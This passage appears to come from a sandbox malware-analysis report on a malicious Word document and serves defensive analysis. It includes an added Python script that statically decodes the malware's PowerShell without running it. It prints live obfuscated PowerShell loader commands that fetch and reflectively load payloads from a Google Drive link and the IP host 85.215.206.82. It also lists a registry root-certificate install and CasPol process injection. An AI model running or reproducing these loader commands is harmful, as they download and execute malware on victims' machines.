ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$').replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WindOwsPoWErSHEll\v1.0\PoweRshELL.exE" "POWERsheLl -ex BYpass -nOp -W 1 -C dEvicECREdeNTiALDEplOYMeNt.eXe ; iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'JEZYM0s5RDc1TktmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFZklOSVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGNrY1BoYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFXSkxTaU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTUGl1VmssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTXZ1bmphZ0RWLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUt4U2tndUgpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiciIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEd4ZVNNVkJxICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkRlgzSzlENzVOS2Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly84NS4yMTUuMjA2LjgyLzI3MC9pZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29ubWUudElGIiwiJEVudjpBUFBEQVRBXGdldGJlc3R0aGluZ3N3aXRoYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3Nvbi52YlMiLDAsMCk7U3RBclQtU2xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcZ2V0YmVzdHRoaW5nc3dpdGhiZXN0cGljdHVyZXdpdGhncmVhdHRoaW5nc29uLnZiUyI='+[cHAR]34+'))')))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdhVUtpbWFnZVVybCA9IHp0c2h0dHBzOi8vZCcrJ3JpdmUuZ29vZ2xlLmNvbS91YycrJz9leHBvJysncnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHp0czsnKydhVUt3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2FVS2ltYWdlQnl0ZXMgPSBhVUt3JysnZWJDbGllbnQuRG93bmxvYWREYXRhKGFVS2ltYWdlVXJsKTthVUtpbWFnZVRleCcrJ3QgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhhVUtpbWFnZUJ5dGVzKTthVUtzdGFydEZsYWcgPSB6dHM8PEJBU0U2NF9TVEFSVD4+enRzO2FVS2VuZEZsYWcnKycgPSB6dHM8PEJBU0U2NF9FTkQ+Pnp0czthVUtzdGFydEluZGV4ID0gYVVLaW1hZ2VUZXh0LkluZGV4T2YoYVVLc3RhcnRGbGFnKTthVUtlbmRJbmRleCA9IGFVS2ltYWdlVGV4dC5JbmRleE9mKGFVS2VuZEZsYWcpO2FVS3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBhVUtlbmRJbmRleCAtZ3QnKycgJysnYVVLc3RhcnRJbmRleDthVUtzdCcrJ2FydEluZGV4ICs9IGFVS3N0YXJ0RmxhZy5MZW5nJysndGg7YVVLYmFzZTY0TGVuZ3RoID0gYVVLZW5kSW5kZXggLSBhVUtzdGFydEluZGV4O2FVS2JhJysnc2U2NENvbW1hbmQgPSBhVUtpbWFnZVRleHQuU3Vic3RyaW5nKGFVS3N0YXJ0SW5kZXgsIGFVS2Jhc2U2NExlbmd0aCk7YVVLYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoYVVLYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIGRyYiBGb3JFYWNoLU9iamVjdCB7IGFVS18gfSlbLTEuLi0oYVVLYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTthVUtjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGcm9tQmFzJysnZTY0U3RyaW5nKGFVS2Jhc2U2NFJldmVyc2VkKTthVUtsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoYVVLY29tbWFuZEJ5dGVzKTthVUt2YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0JysnaG9kKHp0c1ZBSXp0cyk7YVVLdmFpTWUnKyd0aG9kLkludm9rZShhVUtudWxsLCBAKHonKyd0c3R4dC5FQ0RGRlJXLzA3Mi8yOC42MDIuNTEyLjU4Ly86cHR0aHp0cywgenRzZGVzYXRpdmFkb3p0JysncywgenRzZGVzJysnYXRpdmEnKydkb3p0cywgenRzZGVzYXRpdmFkb3p0cywgenRzQ2FzUG9senRzLCB6dHNkZXNhdGl2YWRvenRzLCB6dHNkZScrJ3NhdGl2YWRvenRzLHp0c2Rlc2F0aXZhZG96dHMsenRzJysnZGVzYXRpdmFkb3p0cyx6dHNkZXNhdGl2YWRvenQnKydzLHp0c2Rlc2F0aXZhZG96dHMsJysnenRzZGVzYXRpdmFkb3p0cyx6dHMxenRzLHp0c2Rlc2F0aXZhZG96dHMpKTsnKS5y
ZXBsYWNFKCdhVUsnLCckJykucmVwbGFjRSgnenRzJyxbc1RSaW5HXVtjSEFyXTM5KS5yZXBsYWNFKCdkcmInLCd8Jyl8IC4gKCAkcFNIb01lWzIxXSskUFNob01FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
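                  The powershell.exe command lines above never contain the script they run. Single-quoted fragments are concatenated at run time, the tokens aUK, zts and drb are replaced with $, ' and |, the result is piped into an invoker assembled from characters of $PSHOME ($pSHoMe[21]+$PShoME[34]+'X' resolves to ieX), and the URL handed to [dnlib.IO.Home]::VAI is stored reversed. The type name dnlib.IO.Home also ties the reflectively loaded assembly to the dnlib.* strings found in powershell.exe memory above. The Python below is an added example, not part of the Joe Sandbox report and not the malware's own code: it applies those same transforms statically so the script, the invoker and the indicators can be read without executing anything. Its input CMD is the -command argument of the first "Process created" entry above, copied verbatim; the second helper handles the [char]34-wrapped base64 shape of the mshta-launched stage and is exercised on a constructed blob, not the one from the report. PSHOME is assumed to be the default path (System32 and SysWOW64 have the same length, so the two indices resolve identically under either host).

```python
# Added example (not from the Joe Sandbox report, not the malware's own code):
# static decoder for the PowerShell obfuscation shown in the entries above.
import base64
import re

# Assumption: default PSHOME. System32 and SysWOW64 have the same length, so
# $PSHOME[21] and $PSHOME[34] resolve to the same characters in either host.
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"

# -command argument of the first "Process created" entry above, copied verbatim
# (split across adjacent Python literals only for readability).
CMD = (
    "('aUKimageUrl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id="
    "1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zts;'+'aUKwebClient = New-Object System.Net."
    "WebClient;aUKimageBytes = aUKw'+'ebClient.DownloadData(aUKimageUrl);aUKimageTex'"
    "+'t = [System.Text.Encoding]::UTF8.GetString(aUKimageBytes);aUKstartFlag = "
    "zts<<BASE64_START>>zts;aUKendFlag'+' = zts<<BASE64_END>>zts;aUKstartIndex = "
    "aUKimageText.IndexOf(aUKstartFlag);aUKendIndex = aUKimageText.IndexOf(aUKendFlag);"
    "aUKstartIndex -ge 0 -and aUKendIndex -gt'+' '+'aUKstartIndex;aUKst'+'artIndex += "
    "aUKstartFlag.Leng'+'th;aUKbase64Length = aUKendIndex - aUKstartIndex;aUKba'+"
    "'se64Command = aUKimageText.Substring(aUKstartIndex, aUKbase64Length);"
    "aUKbase64Reversed = -join (aUKbase64Command.ToCharArray() drb ForEach-Object "
    "{ aUK_ })[-1..-(aUKbase64Command.Length)];aUKcommandBytes = [System.Convert]'+"
    "'::FromBas'+'e64String(aUKbase64Reversed);aUKloadedAssembly = "
    "[System.Reflection.Assembly]'+'::Load(aUKcommandBytes);aUKvaiMethod = "
    "[dnlib.IO.Home].GetMet'+'hod(ztsVAIzts);aUKvaiMe'+'thod.Invoke(aUKnull, @(z'+"
    "'tstxt.ECDFFRW/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+"
    "'dozts, ztsdesativadozts, ztsCasPolzts, ztsdesativadozts, ztsde'+'sativadozts,"
    "ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+"
    "'ztsdesativadozts,zts1zts,ztsdesativadozts));').replacE('aUK','$')"
    ".replacE('zts',[sTRinG][cHAr]39).replacE('drb','|')| . ( $pSHoMe[21]+$PShoME[34]+'X')"
)

# Constructed sample of the mshta-launched shape ([char]34-wrapped base64); the
# blob is base64("Start-Sleep 3"), not the blob from the report.
SECOND_STAGE_SAMPLE = (
    "iex($(iEx('[SysTEM.tEXT.ENcODING]'+[Char]58+[chAr]58+'utf8.GeTStriNG([sysTem.CONVerT]'"
    "+[cHar]0X3A+[CHAr]0x3a+'FrOMBASE64STrINg('+[ChAR]0x22+'U3RhcnQtU2xlZXAgMw=='+[cHAR]34+'))')))"
)

def join_concatenation(pieces):
    # 'a'+'b'+'c' -> abc; the fragments hold no literal quote (quotes are spelled zts)
    return "".join(re.findall(r"'([^']*)'", pieces))

def powershell_literal(tok):
    # the only literal forms used as .replace() arguments: 'x' and [string][char]N
    tok = tok.strip()
    if len(tok) >= 2 and tok[0] == tok[-1] == "'":
        return tok[1:-1]
    m = re.fullmatch(r"(?:\[string\])?\[char\](\d+)", tok, re.I)
    if m:
        return chr(int(m.group(1)))  # [sTRinG][cHAr]39 -> "'"
    raise ValueError(f"unsupported literal: {tok!r}")

def parse_replace_chain(chain):
    # .replacE('aUK','$').replacE('zts',[cHAr]39)... -> [('aUK', '$'), ('zts', "'"), ...]
    return [(old, powershell_literal(new))
            for old, new in re.findall(r"\.replace\('([^']*)',([^)]*)\)", chain, re.I)]

def resolve_invoker(expr, pshome=PSHOME):
    # $pSHoMe[21]+$PShoME[34]+'X' -> ieX (cmdlet names are case-insensitive)
    return "".join(pshome[int(idx)] if idx else lit
                   for idx, lit in re.findall(r"\$pshome\[(\d+)\]|'([^']*)'", expr, re.I))

def unreverse(s):
    # the payload URL is passed reversed; flip it back when that yields a URL
    r = s[::-1]
    return r if r.lower().startswith(("http://", "https://")) else s

def invoke_args(script):
    # arguments of the reflective .Invoke($null, @(...)) call, un-reversed
    m = re.search(r"\.Invoke\(\$null,\s*@\((.*?)\)\)", script, re.S)
    return [unreverse(a) for a in re.findall(r"'([^']*)'", m.group(1))] if m else []

def decode_command(cmd, pshome=PSHOME):
    # shape: ( 'frag'+'frag'+... ).replace(...).replace(...)| . ( <invoker expr> )
    m = re.fullmatch(r"\((.*?)\)((?:\.replace\([^)]*\))+)\|\s*\.\s*\((.*)\)\s*",
                     cmd, re.I | re.S)
    if not m:
        raise ValueError("command line does not have the (...).replace(...)| . (...) shape")
    pieces, chain, invoker = m.groups()
    script = join_concatenation(pieces)
    for old, new in parse_replace_chain(chain):  # same order the malware applies them
        script = script.replace(old, new)
    args = invoke_args(script)
    urls = re.findall(r"https?://[^\s']+", script) + [a for a in args if a.startswith("http")]
    return {"invoker": resolve_invoker(invoker, pshome), "script": script,
            "invoke_args": args, "urls": urls}

def decode_char_wrapped_base64(cmd):
    # FrOMBASE64STrINg('+[ChAR]0x22+'<blob>'+[cHAR]34+' : the quote is spelled as
    # [char]34 / 0x22 so it never appears literally; pull the blob out and decode it
    m = re.search(r"\[char\]\s*(?:0x22|34)\+'([A-Za-z0-9+/=]+)'\+\[char\]\s*(?:0x22|34)",
                  cmd, re.I)
    if not m:
        raise ValueError("no [char]34-wrapped base64 blob found")
    return base64.b64decode(m.group(1)).decode("utf-8")

if __name__ == "__main__":
    result = decode_command(CMD)
    print("invoker:", result["invoker"], "| urls:", result["urls"])
    print(result["script"].replace(";", ";\n"))
    print(decode_char_wrapped_base64(SECOND_STAGE_SAMPLE))
```

                  Run as a script it prints the reconstructed stage: a WebClient fetch of the drive.google.com URL, extraction of the text between <<BASE64_START>> and <<BASE64_END>>, reversal and base64-decoding of that text, Assembly.Load of the result and a reflective call to dnlib.IO.Home.VAI. The first argument of that call un-reverses to http://85.215.206.82/270/WRFFDCE.txt, the same host as the tIF download in the mshta-launched stage, and the fifth argument, CasPol, is consistent with the CasPol.exe activity listed later in this report. The decoder only applies string transforms; it never evaluates the script, so it is safe to run on the raw command line.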
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,20_2_0041CBE1
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F748A push esi; ret 8_2_008F748B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F5483 push ebp; ret 8_2_008F548F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F7494 push esp; ret 8_2_008F74B3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F5493 push ebp; ret 8_2_008F54AF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F54BD push ebp; ret 8_2_008F54BF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F54C6 push ebp; ret 8_2_008F546F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F54C6 push ebp; ret 8_2_008F54CF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F540C push ebp; ret 8_2_008F540F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F5A1A push ebp; ret 8_2_008F5A1B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F5024 push esp; ret 8_2_008F5047
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F5A22 push ebp; ret 8_2_008F5A23
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F5456 push ebp; ret 8_2_008F545F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F5463 push ebp; ret 8_2_008F546F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F81CD push ebp; ret 8_2_008F81CF
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F83CA push edi; ret 8_2_008F83CB
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F83C2 push edi; ret 8_2_008F83C3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F81D5 push ebp; ret 8_2_008F81D7
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F83D2 push edi; ret 8_2_008F83D3
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008E01F4 push eax; retf 8_2_008E01F5
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008F550C push ebp; ret 8_2_008F550F
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_008E8F44 push eax; retf 8_2_008E8F61
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 8_2_00902167 push esp; ret 8_2_009023C7
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 11_2_007521E7 push ebx; iretd 11_2_007521EA
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 19_2_002621CD push ebx; iretd 19_2_002621EA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_00457186 push ecx; ret 20_2_00457199
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0045E55D push esi; ret 20_2_0045E566
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_00457AA8 push eax; ret 20_2_00457AC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_00434EB6 push ecx; ret 20_2_00434EC9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_10002806 push ecx; ret 20_2_10002819
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_0044693D push ecx; ret 22_2_0044694D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 22_2_0044DB70 push eax; ret 22_2_0044DB84

                  Persistence and Installation Behavior

                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: \Device\RdpDr\;:1\u4u.kids@SSL\DavWWWRoot
                  Source: settings.xml.rels Extracted files from sample: https://u4u.kids/clm3hy?&sing=cuddly&brain=hapless&kingfish=perpetual&cake=scientific&bacon=kindhearted&jelly=pumped&reveal=reflective&clock=agonizing&yak
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: deethebestthingwithmegreatattirudewithgreatthigns_________eniterlifewithgreatniceworkingskillwithmebgreatthignstobe________verynicepersonentiterlifewithnewthi[1].doc.0.dr
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File dump: 54D5D963.doc.0.dr
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Section loaded: netapi32.dll and davhlpr.dll loaded
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_00406EEB ShellExecuteW,URLDownloadToFileW,20_2_00406EEB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\j0qjax5r\j0qjax5r.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,20_2_0041AADB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 20_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,20_2_0041CBE1
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
